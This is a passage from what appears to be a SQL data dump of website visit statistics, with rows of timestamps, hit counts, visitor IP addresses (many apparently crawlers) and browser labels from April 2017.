1,1,0,0,'217.69.133.238','other'),(100654,1492216042,1,1,0,0,'217.182.132.178','other'),(100655,1492216050,1,1,0,0,'180.76.15.158','other'),(100656,1492216078,1,1,0,0,'51.255.71.129','other'),(100657,1492216585,1,1,0,0,'51.255.65.88','other'),(100658,1492216970,1,1,0,0,'8.29.198.27','other'),(100659,1492217139,1,0,1,0,'66.249.76.108',''),(100660,1492217785,1,1,0,0,'217.69.133.233','other'),(100661,1492217978,1,1,0,0,'164.132.162.188','other'),(100662,1492218170,1,1,0,0,'217.69.133.203','other'),(100663,1492218226,1,1,0,0,'217.69.136.205','other'),(100664,1492218266,1,1,0,0,'217.69.133.84','other'),(100665,1492218491,1,1,0,0,'51.255.65.65','other'),(100666,1492218657,1,1,0,0,'217.182.132.52','other'),(100667,1492218740,1,1,0,0,'137.74.207.159','other'),(100668,1492218820,1,1,0,0,'217.69.136.203','other'),(100669,1492218823,1,1,0,0,'217.69.136.207','other'),(100670,1492219139,1,0,1,0,'40.77.167.25',''),(100671,1492219312,1,0,1,0,'66.249.76.27',''),(100672,1492219806,1,1,0,0,'217.69.136.209','other'),(100673,1492219808,1,1,0,0,'217.69.136.207','other'),(100674,1492219914,1,1,0,0,'51.255.71.111','other'),(100675,1492220221,1,1,0,0,'216.244.66.237','other'),(100676,1492220340,1,0,1,0,'66.249.76.109',''),(100677,1492220707,1,1,0,0,'51.255.65.27','other'),(100678,1492220874,1,1,0,0,'51.255.65.40','other'),(100679,1492220974,1,1,0,0,'51.255.71.120','other'),(100680,1492221551,1,1,0,0,'217.69.133.236','other'),(100681,1492221805,1,1,0,0,'5.167.127.219','msie'),(100682,1492221836,1,1,0,0,'51.255.65.66','other'),(100683,1492221859,1,1,0,0,'164.132.161.19','other'),(100684,1492222106,1,1,0,0,'217.69.133.235','other'),(100685,1492222292,1,1,0,0,'51.255.65.13','other'),(100686,1492222304,1,1,0,0,'164.132.161.31','other'),(100687,1492222447,1,1,0,0,'217.69.133.218','other'),(100688,1492222484,1,1,0,0,'51.255.65.42','other'),(100689,1492223096,1,1,0,0,'217.69.133.230','other'),(100690,1492223335,1,1,0,0,'51.255.65.6','other'),(100691,1492223669,1,1,0,0,'217.182.132.65','other'),(100692,1492224046,1,1,0,0,'164.132.161.52','other'),(100693,1492224251,1,1,0,0,'217.182.132.58','other'),(100694,1492224286,1,1,0,0,'217.182.132.68','other'),(100695,1492224940,1,1,0,0,'217.182.132.23','other'),(100696,1492225079,1,1,0,0,'217.69.133.220','other'),(100697,1492225173,1,1,0,0,'164.132.161.37','other'),(100698,1492225199,1,1,0,0,'164.132.161.49','other'),(100699,1492225280,1,1,0,0,'217.182.132.77','other'),(100700,1492225319,1,1,0,0,'216.244.66.237','other'),(100701,1492225545,1,1,0,0,'51.255.65.91','other'),(100702,1492225695,1,1,0,0,'217.182.132.76','other'),(100703,1492226107,1,1,0,0,'217.69.133.218','other'),(100704,1492226196,1,1,0,0,'40.77.167.25','other'),(100705,1492226225,1,1,0,0,'217.69.133.229','other'),(100706,1492227488,1,0,1,0,'66.249.66.84',''),(100707,1492227492,1,1,0,0,'217.182.132.182','other'),(100708,1492227799,1,1,0,0,'8.29.198.26','other'),(100709,1492227812,1,1,0,0,'141.0.13.52','other'),(100710,1492228886,1,1,0,0,'217.182.132.153','other'),(100711,1492229027,1,1,0,0,'217.69.133.225','other'),(100712,1492229033,1,1,0,0,'51.255.71.126','other'),(100713,1492229376,1,1,0,0,'164.132.161.49','other'),(100714,1492229591,1,1,0,0,'180.76.15.23','other'),(100715,1492229829,1,1,0,0,'217.69.133.3','other'),(100716,1492229832,1,1,0,0,'217.182.132.83','other'),(100717,1492230586,1,1,0,0,'164.132.161.54','other'),(100718,1492231196,1,1,0,0,'164.132.161.44','other'),(100719,1492231208,1,1,0,0,'217.69.136.209','other'),(100720,1492231264,1,1,0,0,'164.132.162.159','other'),(100721,1492231453,1,1,0,0,'207.46.13.232','other'),(100722,1492232054,1,1,0,0,'217.69.133.229','other'),(100723,1492232308,1,1,0,0,'164.132.161.53','other'),(100724,1492232936,1,1,0,0,'164.132.161.22','other'),(100725,1492233023,1,1,0,0,'51.255.71.125','other'),(100726,1492233073,1,1,0,0,'216.244.66.237','other'),(100727,1492233302,1,1,0,0,'217.69.133.236','other'),(100728,1492234129,1,1,0,0,'164.132.161.43','other'),(100729,1492234433,6,6,0,0,'163.172.74.103','other'),(100730,1492234688,1,1,0,0,'217.69.133.233','other'),(100731,1492235017,1,1,0,0,'66.102.9.27','chrome'),(100732,1492235076,1,1,0,0,'217.69.136.206','other'),(100733,1492235078,1,1,0,0,'217.69.136.207','other'),(100734,1492235399,1,1,0,0,'164.132.161.46','other'),(100735,1492236439,1,1,0,0,'217.69.136.209','other'),(100736,1492236753,1,0,1,0,'66.249.66.177',''),(100737,1492237111,1,1,0,0,'217.69.133.225','other'),(100738,1492237250,1,1,0,0,'217.69.133.231','other'),(100739,1492237571,1,1,0,0,'137.74.207.161','other'),(100740,1492237652,1,1,0,0,'51.255.65.60','other'),(100741,1492238474,1,0,1,0,'66.249.66.84',''),(100742,1492238627,1,1,0,0,'8.29.198.27','other'),(100743,1492238802,1,1,0,0,'217.69.133.70','other'),(100744,1492239905,1,1,0,0,'51.255.65.3','other'),(100745,1492240032,1,1,0,0,'164.132.161.2','other'),(100746,1492240303,1,0,1,0,'66.249.66.177',''),(100747,1492240381,1,1,0,0,'51.255.65.40','other'),(100748,1492240617,2,2,0,0,'217.69.133.217','other'),(100749,1492240736,1,0,1,0,'66.249.76.29',''),(100750,1492241526,1,1,0,0,'217.69.133.67','other'),(100751,1492241637,1,1,0,0,'51.255.65.4','other'),(100752,1492241660,1,1,0,0,'217.69.136.209','other'),(100753,1492242213,1,1,0,0,'51.255.65.46','other'),(100754,1492242263,1,1,0,0,'217.69.133.70','other'),(100755,1492242689,1,1,0,0,'51.255.65.29','other'),(100756,1492242718,1,1,0,0,'217.182.132.66','other'),(100757,1492242816,1,1,0,0,'217.69.136.209','other'),(100758,1492243793,1,1,0,0,'51.255.65.51','other'),(100759,1492243951,1,1,0,0,'217.182.132.96','other'),(100760,1492244091,1,1,0,0,'91.196.178.37','chrome'),(100761,1492244511,1,1,0,0,'164.132.161.48','other'),(100762,1492245153,1,1,0,0,'164.132.161.65','other'),(100763,1492246063,1,1,0,0,'51.255.65.24','other'),(100764,1492246766,1,1,0,0,'51.255.71.114','other'),(100765,1492246946,1,1,0,0,'217.69.136.204','other'),(100766,1492246950,1,1,0,0,'217.69.136.210','other'),(100767,1492247008,1,1,0,0,'91.196.178.37','chrome'),(100768,1492247443,1,1,0,0,'164.132.161.88','other'),(100769,1492247463,1,1,0,0,'217.69.133.194','other'),(100770,1492247560,1,1,0,0,'164.132.161.74','other'),(100771,1492247621,1,1,0,0,'164.132.161.71','other'),(100772,1492247966,1,1,0,0,'217.182.132.73','other'),(100773,1492248343,1,1,0,0,'217.182.132.57','other'),(100774,1492248349,1,1,0,0,'51.255.65.74','other'),(100775,1492248509,1,1,0,0,'151.80.27.116','other'),(100776,1492248795,1,1,0,0,'217.69.133.218','other'),(100777,1492248808,1,1,0,0,'66.249.76.107','chrome'),(100778,1492249009,1,1,0,0,'217.69.133.68','other'),(100779,1492249011,1,1,0,0,'217.69.136.206','other'),(100780,1492249012,1,1,0,0,'217.69.133.223','other'),(100781,1492249411,1,1,0,0,'164.132.161.9','other'),(100782,1492249452,1,1,0,0,'8.29.198.27','other'),(100783,1492250221,1,1,0,0,'91.209.11.236','other'),(100784,1492250293,1,1,0,0,'217.69.133.70','other'),(100785,1492250981,1,1,0,0,'51.255.65.72','other'),(100786,1492251052,1,1,0,0,'164.132.161.12','other'),(100787,1492251564,1,1,0,0,'78.24.29.252','msie'),(100788,1492251740,1,1,0,0,'217.69.133.228','other'),(100789,1492252454,1,1,0,0,'217.69.133.216','other'),(100790,1492252484,1,1,0,0,'217.69.136.209','other'),(100791,1492252915,1,1,0,0,'217.182.132.33','other'),(100792,1492253102,1,1,0,0,'51.255.65.96','other'),(100793,1492253590,1,1,0,0,'51.255.65.30','other'),(100794,1492253682,1,1,0,0,'164.132.161.55','other'),(100795,1492253703,1,1,0,0,'164.132.162.164','other'),(100796,1492254212,1,1,0,0,'217.69.133.216','other'),(100797,1492254745,1,1,0,0,'217.182.132.149','other'),(100798,1492255317,1,1,0,0,'217.182.132.72','other'),(100799,1492255482,1,1,0,0,'164.132.161.15','other'),(100800,1492255803,1,1,0,0,'208.43.225.85','other'),(100801,1492256311,1,1,0,0,'217.182.132.62','other'),(100802,1492256317,1,1,0,0,'180.76.15.6','other'),(100803,1492256778,1,1,0,0,'51.255.65.34','other'),(100804,1492257096,1,1,0,0,'217.69.133.237','other'),(100805,1492257612,1,1,0,0,'164.132.162.159','other'),(100806,1492257615,1,1,0,0,'217.69.136.208','other'),(100807,1492257798,1,1,0,0,'164.132.161.80','other'),(100808,1492258203,1,1,0,0,'217.69.133.2','other'),(100809,1492258560,1,1,0,0,'31.128.251.149','chrome'),(100810,1492258574,1,1,0,0,'37.9.113.43','other'),(100811,1492258751,1,1,0,0,'217.182.132.63','other'),(100812,1492259064,1,1,0,0,'51.255.65.80','other'),(100813,1492259222,1,1,0,0,'51.255.65.48','other'),(100814,1492259397,1,1,0,0,'164.132.161.59','other'),(100815,1492259450,1,1,0,0,'217.182.132.27','other'),(100816,1492259632,1,1,0,0,'51.255.65.28','other'),(100817,1492260105,1,1,0,0,'217.69.133.232','other'),(100818,1492260107,1,1,0,0,'217.69.133.230','other'),(100819,1492260110,1,1,0,0,'217.69.133.231','other'),(100820,1492260284,1,1,0,0,'8.29.198.27','other'),(100821,1492260406,2,0,2,0,'66.249.76.108',''),(100822,1492260451,1,1,0,0,'164.132.161.49','other'),(100823,1492260510,1,1,0,0,'51.255.65.10','other'),(100824,1492260683,1,1,0,0,'137.74.207.108','other'),(100825,1492261129,1,1,0,0,'217.69.133.240','other'),(100826,1492261132,1,1,0,0,'217.69.133.70','other'),(100827,1492261382,1,1,0,0,'216.244.66.237','other'),(100828,1492261526,1,1,0,0,'51.255.65.8','other'),(100829,1492261583,1,1,0,0,'164.132.162.155','other'),(100830,1492261738,1,1,0,0,'164.132.161.46','other'),(100831,1492261818,1,1,0,0,'217.182.132.85','other'),(100832,1492261920,1,1,0,0,'164.132.161.31','other'),(100833,1492262214,1,1,0,0,'51.255.65.81','other'),(100834,1492262515,1,1,0,0,'137.74.207.119','other'),(100835,1492262686,1,1,0,0,'188.255.16.217','chrome'),(100836,1492263021,1,1,0,0,'217.182.132.82','other'),(100837,1492263255,1,1,0,0,'217.182.132.58','other'),(100838,1492263364,1,1,0,0,'217.69.133.226','other'),(100839,1492263497,1,1,0,0,'217.182.132.69','other'),(100840,1492263649,1,0,1,0,'66.249.66.84',''),(100841,1492264350,1,1,0,0,'217.182.132.4','other'),(100842,1492264626,1,1,0,0,'217.69.133.85','other'),(100843,1492264653,1,1,0,0,'91.209.11.236','other'),(100844,1492264689,1,1,0,0,'164.132.161.67','other'),(100845,1492264732,1,0,1,0,'66.249.66.177',''),(100846,1492264884,1,1,0,0,'217.182.132.170','other'),(100847,1492264885,1,1,0,0,'217.69.133.194','other'),(100848,1492265601,1,1,0,0,'217.182.132.240','other'),(100849,1492265629,1,1,0,0,'51.255.71.101','other'),(100850,1492265673,1,1,0,0,'164.132.161.97','other'),(100851,1492265805,1,1,0,0,'217.69.133.216','other'),(100852,1492265976,1,1,0,0,'164.132.161.29','other'),(100853,1492266194,1,1,0,0,'217.69.133.220','other'),(100854,1492266728,1,1,0,0,'217.69.133.232','other'),(100855,1492266766,1,1,0,0,'95.108.213.34','other'),(100856,1492266812,1,1,0,0,'141.8.142.154','other'),(100857,1492266962,1,1,0,0,'51.255.71.131','other'),(100858,1492267100,1,1,0,0,'164.132.161.22','other'),(100859,1492267575,1,1,0,0,'217.182.132.65','other'),(100860,1492267704,1,1,0,0,'164.132.161.6','other'),(100861,1492267789,1,1,0,0,'51.255.65.79','other'),(100862,1492268147,1,1,0,0,'164.132.161.16','other'),(100863,1492268206,1,1,0,0,'66.249.93.156','chrome'),(100864,1492268319,1,1,0,0,'164.132.161.81','other'),(100865,1492268557,5,0,5,0,'68.180.229.99',''),(100866,1492268770,1,1,0,0,'217.69.133.218','other'),(100867,1492268811,1,1,0,0,'217.182.132.147','other'),(100868,1492269069,1,1,0,0,'217.69.133.230','other'),(100869,1492269310,1,1,0,0,'164.132.161.96','other'),(100870,1492269724,1,1,0,0,'51.255.65.27','other'),(100871,1492269939,1,1,0,0,'193.194.127.217','firefox'),(100872,1492270122,1,1,0,0,'217.69.136.203','other'),(100873,1492270437,1,1,0,0,'217.182.132.77','other'),(100874,1492270662,1,1,0,0,'217.69.133.6','other'),(100875,1492270822,1,1,0,0,'217.69.133.218','other'),(100876,1492270898,1,1,0,0,'217.69.133.235','other'),(100877,1492271094,1,1,0,0,'164.132.161.51','other'),(100878,1492271115,1,1,0,0,'8.29.198.27','other'),(100879,1492271146,1,1,0,0,'164.132.161.5','other'),(100880,1492271252,1,1,0,0,'217.69.133.233','other'),(100881,1492271254,1,1,0,0,'217.69.133.231','other'),(100882,1492271420,1,1,0,0,'217.182.132.52','other'),(100883,1492271893,1,1,0,0,'164.132.161.79','other'),(100884,1492271899,1,1,0,0,'164.132.161.87','other'),(100885,1492271935,1,1,0,0,'91.196.53.132','chrome'),(100886,1492271946,1,1,0,0,'217.182.132.74','other'),(100887,1492271999,1,1,0,0,'66.249.76.29','chrome'),(100888,1492272079,1,1,0,0,'217.182.132.64','other'),(100889,1492272358,1,1,0,0,'51.255.65.83','other'),(100890,1492272838,1,1,0,0,'217.182.132.65','other'),(100891,1492273270,1,0,1,0,'68.180.229.99',''),(100892,1492274016,1,1,0,0,'217.69.133.239','other'),(100893,1492274076,1,1,0,0,'164.132.161.65','other'),(100894,1492274497,1,1,0,0,'164.132.162.157','other'),(100895,1492274526,1,1,0,0,'164.132.161.66','other'),(100896,1492274981,3,3,0,0,'216.244.66.237','other'),(100897,1492275375,1,1,0,0,'217.69.133.203','other'),(100898,1492275716,1,1,0,0,'164.132.161.94','other'),(100899,1492275751,1,1,0,0,'40.77.167.25','other'),(100900,1492275769,1,0,1,0,'207.46.13.37',''),(100901,1492276218,1,1,0,0,'217.182.132.34','other'),(100902,1492276468,1,1,0,0,'217.69.133.5','other'),(100903,1492276738,1,1,0,0,'157.55.39.133','other'),(100904,1492277360,1,1,0,0,'217.69.133.216','other'),(100905,1492277919,1,1,0,0,'51.255.65.63','other'),(100906,1492277990,1,1,0,0,'164.132.161.55','other'),(100907,1492278027,1,1,0,0,'51.255.71.122','other'),(100908,1492278470,1,1,0,0,'164.132.161.96','other'),(100909,1492278951,1,1,0,0,'164.132.161.77','other'),(100910,1492279166,1,1,0,0,'217.69.133.233','other'),(100911,1492279797,1,1,0,0,'164.132.161.35','other'),(100912,1492279956,1,1,0,0,'217.69.133.217','other'),(100913,1492280901,1,1,0,0,'51.255.65.24','other'),(100914,1492281097,1,1,0,0,'180.76.15.137','other'),(100915,1492281498,1,1,0,0,'51.255.65.89','other'),(100916,1492281641,1,1,0,0,'217.182.132.153','other'),(100917,1492281948,1,1,0,0,'8.29.198.26','other'),(100918,1492282370,1,1,0,0,'217.182.132.91','other'),(100919,1492282508,1,1,0,0,'217.69.136.204','other'),(100920,1492282721,1,1,0,0,'51.255.71.112','other'),(100921,1492283482,1,1,0,0,'217.182.132.20','other'),(100922,1492283615,1,0,1,0,'66.249.76.107',''),(100923,1492284434,1,0,1,0,'66.249.76.108',''),(100924,1492284575,1,1,0,0,'217.182.132.149','other'),(100925,1492284617,1,1,0,0,'217.69.133.217','other'),(100926,1492285970,1,1,0,0,'51.255.65.43','other'),(100927,1492286108,1,1,0,0,'217.182.132.27','other'),(100928,1492286771,1,1,0,0,'164.132.161.21','other'),(100929,1492287412,1,1,0,0,'46.211.200.131','chrome'),(100931,1492287820,1,0,1,0,'66.249.76.28',''),(100932,1492288191,1,1,0,0,'51.255.65.51','other'),(100933,1492288483,1,0,1,0,'66.249.66.180',''),(100934,1492288923,1,1,0,0,'5.228.20.251','chrome'),(100935,1492288924,1,1,0,0,'109.63.150.108','chrome'),(100936,1492288993,1,1,0,0,'51.255.65.84','other'),(100937,1492289311,1,1,0,0,'51.255.65.38','other'),(100938,1492290111,1,1,0,0,'51.255.65.81','other'),(100939,1492290394,1,1,0,0,'51.255.65.224','other'),(100940,1492290752,1,1,0,0,'217.182.132.52','other'),(100941,1492291238,1,1,0,0,'217.182.132.86','other'),(100942,1492291355,1,1,0,0,'217.182.132.15','other'),(100943,1492291794,1,1,0,0,'51.255.65.31','other'),(100944,1492292774,1,1,0,0,'8.29.198.26','other'),(100945,1492293594,1,1,0,0,'164.132.161.6','other'),(100946,1492293663,1,1,0,0,'95.108.213.34','other'),(100947,1492293996,1,0,1,0,'66.249.76.108',''),(100948,1492294161,1,1,0,0,'164.132.162.159','other'),(100949,1492294310,1,0,1,0,'66.249.76.107',''),(100950,1492294475,1,1,0,0,'217.182.132.78','other'),(100951,1492294605,1,1,0,0,'217.182.132.146','other'),(100952,1492294637,1,1,0,0,'164.132.161.61','other'),(100953,1492295213,1,1,0,0,'217.182.132.53','other'),(100954,1492295451,1,1,0,0,'217.182.132.36','other'),(100955,1492295576,1,1,0,0,'217.69.133.3','other'),(100956,1492295681,1,0,1,0,'66.249.66.84',''),(100957,1492295951,1,1,0,0,'217.69.133.238','other'),(100958,1492296047,1,1,0,0,'109.63.189.61','msie'),(100959,1492296162,1,1,0,0,'51.255.65.8','other'),(100960,1492296247,1,1,0,0,'217.182.132.82','other'),(100961,1492296388,1,1,0,0,'216.244.66.237','other'),(100962,1492296608,1,1,0,0,'164.132.161.58','other'),(100963,1492297012,1,1,0,0,'164.132.161.35','other'),(100964,1492297184,1,1,0,0,'217.182.132.64','other'),(100965,1492297820,1,0,1,0,'66.249.66.81',''),(100966,1492298004,1,0,1,0,'66.249.76.109',''),(100967,1492298480,1,1,0,0,'176.195.124.3','msie'),(100968,1492298515,1,1,0,0,'95.24.25.5','msie'),(100969,1492298790,1,1,0,0,'137.74.207.188','other'),(100970,1492299035,1,1,0,0,'217.69.133.234','other'),(100971,1492299056,1,1,0,0,'217.182.132.36','other'),(100972,1492299590,1,1,0,0,'51.255.65.85','other'),(100973,1492299602,1,1,0,0,'164.132.161.76','other'),(100974,1492299866,1,1,0,0,'109.64.142.233','chrome'),(100975,1492299878,1,1,0,0,'178.154.200.37','other'),(100976,1492300306,1,1,0,0,'51.255.65.59','other'),(100977,1492300741,1,1,0,0,'164.132.161.54','other'),(100978,1492301836,1,1,0,0,'137.74.207.159','other'),(100979,1492301916,1,1,0,0,'137.74.207.120','other'),(100980,1492302341,1,1,0,0,'217.182.132.152','other'),(100981,1492302398,2,2,0,0,'164.132.161.54','other'),(100982,1492302623,1,1,0,0,'51.255.65.43','other'),(100983,1492302840,1,1,0,0,'208.43.225.84','other'),(100984,1492303601,1,1,0,0,'8.29.198.26','other'),(100985,1492303692,2,2,0,0,'141.8.183.1','other'),(100986,1492303697,1,1,0,0,'95.108.213.32','other'),(100987,1492303700,1,1,0,0,'141.8.132.50','other'),(100988,1492303705,1,1,0,0,'178.154.189.21','other'),(100989,1492303709,1,1,0,0,'93.158.152.42','other'),(100990,1492303716,1,1,0,0,'178.154.200.60','other'),(100991,1492304346,1,1,0,0,'216.244.66.237','other'),(100992,1492304919,1,1,0,0,'217.182.132.79','other'),(100993,1492305610,1,1,0,0,'141.0.13.172','other'),(100994,1492305831,1,1,0,0,'51.255.71.115','other'),(100995,1492306045,1,1,0,0,'180.76.15.145','other'),(100996,1492306523,1,1,0,0,'91.196.178.71','chrome'),(100997,1492306850,1,1,0,0,'51.255.65.64','other'),(100998,1492306930,1,0,1,0,'66.249.66.180',''),(100999,1492307050,1,1,0,0,'51.255.65.61','other'),(101000,1492307744,1,1,0,0,'217.182.132.30','other'),(101001,1492308288,1,1,0,0,'141.0.13.172','other'),(101002,1492308688,1,1,0,0,'51.255.71.131','other'),(101003,1492308856,1,1,0,0,'51.255.65.79','other'),(101004,1492310261,1,1,0,0,'217.182.132.179','other'),(101005,1492310590,1,1,0,0,'217.182.132.72','other'),(101006,1492310856,1,1,0,0,'164.132.162.188','other'),(101007,1492310931,1,1,0,0,'164.132.161.13','other'),(101008,1492311517,1,1,0,0,'217.182.132.151','other'),(101009,1492311774,1,1,0,0,'164.132.161.62','other'),(101010,1492311776,1,1,0,0,'217.182.132.68','other'),(101011,1492311884,1,0,1,0,'66.249.66.84',''),(101012,1492312793,1,1,0,0,'217.182.132.15','other'),(101013,1492312851,1,0,1,0,'66.249.76.107',''),(101014,1492313431,1,1,0,0,'137.74.207.114','other'),(101015,1492313589,1,1,0,0,'217.182.132.20','other'),(101016,1492313636,1,1,0,0,'51.255.65.16','other'),(101017,1492313950,1,1,0,0,'217.182.132.53','other'),(101018,1492314366,1,1,0,0,'51.255.65.72','other'),(101019,1492314426,1,1,0,0,'8.29.198.27','other'),(101020,1492315018,1,1,0,0,'217.182.132.34','other'),(101021,1492315036,1,1,0,0,'82.145.223.136','other'),(101022,1492316579,1,1,0,0,'164.132.161.60','other'),(101023,1492316628,1,1,0,0,'164.132.161.27','other'),(101024,1492316875,1,1,0,0,'164.132.162.188','other'),(101025,1492316894,1,1,0,0,'137.74.207.116','other'),(101026,1492317131,2,2,0,0,'40.77.167.137','other'),(101027,1492317774,1,1,0,0,'217.182.132.27','other'),(101028,1492317810,1,1,0,0,'217.182.132.87','other'),(101029,1492318446,1,1,0,0,'164.132.161.97','other'),(101030,1492318749,1,0,1,0,'66.249.76.28',''),(101031,1492319054,1,1,0,0,'88.99.195.39','other'),(101032,1492319313,1,1,0,0,'164.132.161.34','other'),(101033,1492319592,1,1,0,0,'217.182.132.152','other'),(101034,1492319773,1,1,0,0,'137.74.203.194','other'),(101035,1492319808,1,1,0,0,'216.244.66.237','other'),(101036,1492319988,1,1,0,0,'51.255.71.100','other'),(101037,1492320922,1,1,0,0,'51.255.71.133','other'),(101038,1492321005,1,1,0,0,'51.255.65.52','other'),(101039,1492321062,1,1,0,0,'51.255.65.63','other'),(101040,1492321200,1,0,1,0,'40.77.167.25',''),(101041,1492322268,1,1,0,0,'217.182.132.55','other'),(101042,1492322344,1,1,0,0,'217.69.133.9','other'),(101043,1492322405,1,0,1,0,'40.77.167.102',''),(101044,1492322701,1,1,0,0,'137.74.207.119','other'),(101045,1492323583,1,1,0,0,'217.182.132.55','other'),(101046,1492324237,16,16,0,0,'51.255.172.248','other'),(101047,1492324289,1,1,0,0,'82.145.221.167','other'),(101048,1492324730,1,1,0,0,'51.255.65.88','other'),(101049,1492325251,1,1,0,0,'8.29.198.27','other'),(101050,1492325331,1,0,1,0,'66.249.66.183',''),(101051,1492325539,1,1,0,0,'164.132.161.24','other'),(101052,1492326010,1,1,0,0,'217.182.132.32','other'),(101053,1492326360,1,1,0,0,'137.74.207.101','other'),(101054,1492326912,1,1,0,0,'217.182.132.23','other'),(101055,1492328555,1,1,0,0,'141.8.142.164','other'),(101056,1492328559,2,2,0,0,'95.108.213.34','other'),(101057,1492328726,1,0,1,0,'157.55.39.141',''),(101058,1492329449,1,0,1,0,'66.249.76.108',''),(101059,1492329526,1,1,0,0,'217.69.133.9','other'),(101060,1492329688,1,1,0,0,'95.108.179.15','other'),(101061,1492329846,1,1,0,0,'51.255.65.29','other'),(101062,1492330067,1,1,0,0,'164.132.161.38','other'),(101063,1492330626,1,1,0,0,'51.255.65.67','other'),(101064,1492331746,1,1,0,0,'217.182.132.21','other'),(101065,1492331825,1,1,0,0,'164.132.161.27','other'),(101066,1492332582,1,1,0,0,'217.182.132.241','other'),(101067,1492332592,1,0,1,0,'66.249.66.81',''),(101068,1492333024,1,1,0,0,'164.132.161.61','other'),(101069,1492333258,1,1,0,0,'164.132.161.66','other'),(101070,1492333283,1,1,0,0,'164.132.161.76','other'),(101071,1492333544,1,0,1,0,'66.249.66.81',''),(101072,1492333761,1,1,0,0,'137.74.207.110','other'),(101073,1492334597,1,0,1,0,'66.249.76.108',''),(101074,1492334658,1,1,0,0,'91.196.178.37','chrome'),(101075,1492334844,1,0,1,0,'66.249.66.87',''),(101076,1492335044,1,1,0,0,'164.132.161.85','other'),(101077,1492335524,1,1,0,0,'51.255.71.126','other'),(101078,1492335543,1,1,0,0,'217.182.132.175','other'),(101079,1492335760,1,1,0,0,'164.132.161.22','other'),(101080,1492336085,1,1,0,0,'8.29.198.26','other'),(101081,1492336581,1,1,0,0,'157.55.39.67','other'),(101082,1492336681,1,1,0,0,'164.132.161.43','other'),(101083,1492336824,1,1,0,0,'164.132.161.27','other'),(101084,1492336827,1,1,0,0,'51.255.65.43','other'),(101085,1492336993,1,1,0,0,'217.182.132.72','other'),(101086,1492337385,1,1,0,0,'164.132.162.188','other'),(101087,1492337825,1,0,1,0,'66.249.76.27',''),(101088,1492338143,1,1,0,0,'217.182.132.190','other'),(101089,1492338743,1,1,0,0,'217.182.132.16','other'),(101090,1492338809,1,1,0,0,'137.74.201.108','other'),(101091,1492339111,1,1,0,0,'217.182.132.51','other'),(101092,1492339653,1,1,0,0,'164.132.161.97','other'),(101093,1492340293,1,1,0,0,'217.182.132.240','other'),(101094,1492340687,1,1,0,0,'141.0.13.132','other'),(101095,1492341797,1,1,0,0,'164.132.161.69','other'),(101096,1492342484,3,3,0,0,'216.244.66.237','other'),(101097,1492342712,1,1,0,0,'164.132.161.89','other'),(101098,1492343073,1,1,0,0,'164.132.161.14','other'),(101099,1492343485,1,1,0,0,'217.182.132.151','other'),(101100,1492344701,1,1,0,0,'51.255.64.106','other'),(101101,1492344750,1,1,0,0,'217.182.132.93','other'),(101102,1492344931,1,1,0,0,'51.255.65.59','other'),(101103,1492345054,1,0,1,0,'66.249.76.107',''),(101104,1492345117,3,3,0,0,'216.244.66.237','other'),(101105,1492345535,1,1,0,0,'51.255.65.81','other'),(101106,1492345558,1,1,0,0,'51.255.71.98','other'),(101107,1492345930,1,1,0,0,'207.46.13.56','other'),(101108,1492346020,1,1,0,0,'66.249.93.156','chrome'),(101109,1492346275,1,1,0,0,'46.211.154.219','other'),(101110,1492346567,1,1,0,0,'51.255.65.7','other'),(101111,1492346914,1,1,0,0,'8.29.198.27','other'),(101112,1492347267,1,1,0,0,'51.255.65.43','other'),(101113,1492347842,1,1,0,0,'164.132.161.52','other'),(101114,1492348267,1,1,0,0,'51.255.65.83','other'),(101115,1492348326,1,1,0,0,'164.132.161.70','other'),(101116,1492348600,1,1,0,0,'91.196.178.34','chrome'),(101117,1492349690,1,1,0,0,'51.255.65.53','other'),(101118,1492350139,1,1,0,0,'37.54.16.42','firefox'),(101119,1492350258,1,1,0,0,'217.182.132.152','other'),(101120,1492351430,1,1,0,0,'51.255.65.57','other'),(101121,1492351438,1,1,0,0,'164.132.161.30','other'),(101122,1492351788,1,1,0,0,'164.132.161.14','other'),(101123,1492352346,1,1,0,0,'217.182.132.37','other'),(101124,1492352542,1,1,0,0,'164.132.161.62','other'),(101125,1492352784,1,1,0,0,'82.145.220.90','other'),(101126,1492353129,1,1,0,0,'164.132.161.73','other'),(101127,1492353564,1,1,0,0,'217.69.133.222','other'),(101128,1492353598,1,1,0,0,'217.182.132.14','other'),(101129,1492354333,1,1,0,0,'217.69.133.5','other'),(101130,1492354375,1,1,0,0,'217.182.132.173','other'),(101131,1492355397,2,2,0,0,'51.255.65.11','other'),(101132,1492355491,1,1,0,0,'51.255.65.80','other'),(101133,1492355576,1,0,1,0,'66.249.66.180',''),(101134,1492356072,1,1,0,0,'66.249.66.81','chrome'),(101136,1492356897,1,1,0,0,'137.74.201.99','other'),(101137,1492357200,1,1,0,0,'91.214.209.229','other'),(101138,1492357745,1,1,0,0,'8.29.198.27','other'),(101139,1492358037,1,0,1,0,'66.249.76.29',''),(101140,1492358245,1,1,0,0,'217.69.133.216','other'),(101141,1492358718,1,1,0,0,'180.76.15.24','other'),(101142,1492359123,1,1,0,0,'217.182.132.69','other'),(101143,1492359173,1,1,0,0,'137.74.201.100','other'),(101144,1492359487,1,0,1,0,'66.249.66.87',''),(101145,1492359654,1,1,0,0,'164.132.161.39','other'),(101146,1492360118,1,1,0,0,'176.31.231.10','other'),(101147,1492361138,1,1,0,0,'217.182.132.25','other'),(101148,1492361534,1,1,0,0,'164.132.161.28','other'),(101149,1492361589,1,0,1,0,'66.249.66.177',''),(101150,1492362592,1,1,0,0,'51.255.65.62','other'),(101151,1492363336,1,1,0,0,'51.255.71.121','other'),(101152,1492363414,1,1,0,0,'217.182.132.52','other'),(101153,1492363528,1,1,0,0,'217.182.132.157','other'),(101154,1492363697,1,1,0,0,'109.206.63.16','chrome'),(101155,1492363709,1,1,0,0,'164.132.161.30','other'),(101156,1492364231,1,1,0,0,'164.132.161.19','other'),(101157,1492364362,1,1,0,0,'92.112.249.55','firefox'),(101158,1492364575,1,1,0,0,'217.182.132.151','other'),(101159,1492364911,1,1,0,0,'217.182.132.90','other'),(101160,1492365380,1,1,0,0,'92.112.249.55','firefox'),(101161,1492366170,1,1,0,0,'51.255.65.44','other'),(101162,1492366360,1,1,0,0,'157.55.39.137','other'),(101163,1492366786,1,1,0,0,'164.132.161.40','other'),(101164,1492366975,1,1,0,0,'164.132.161.55','other'),(101165,1492367006,1,1,0,0,'137.74.207.119','other'),(101166,1492367026,1,1,0,0,'216.244.66.237','other'),(101167,1492367685,1,1,0,0,'164.132.161.23','other'),(101168,1492367721,1,1,0,0,'51.255.65.56','other'),(101169,1492367770,1,1,0,0,'137.74.201.108','other'),(101170,1492367947,1,1,0,0,'37.204.34.170','msie'),(101171,1492367968,1,1,0,0,'164.132.161.80','other'),(101172,1492368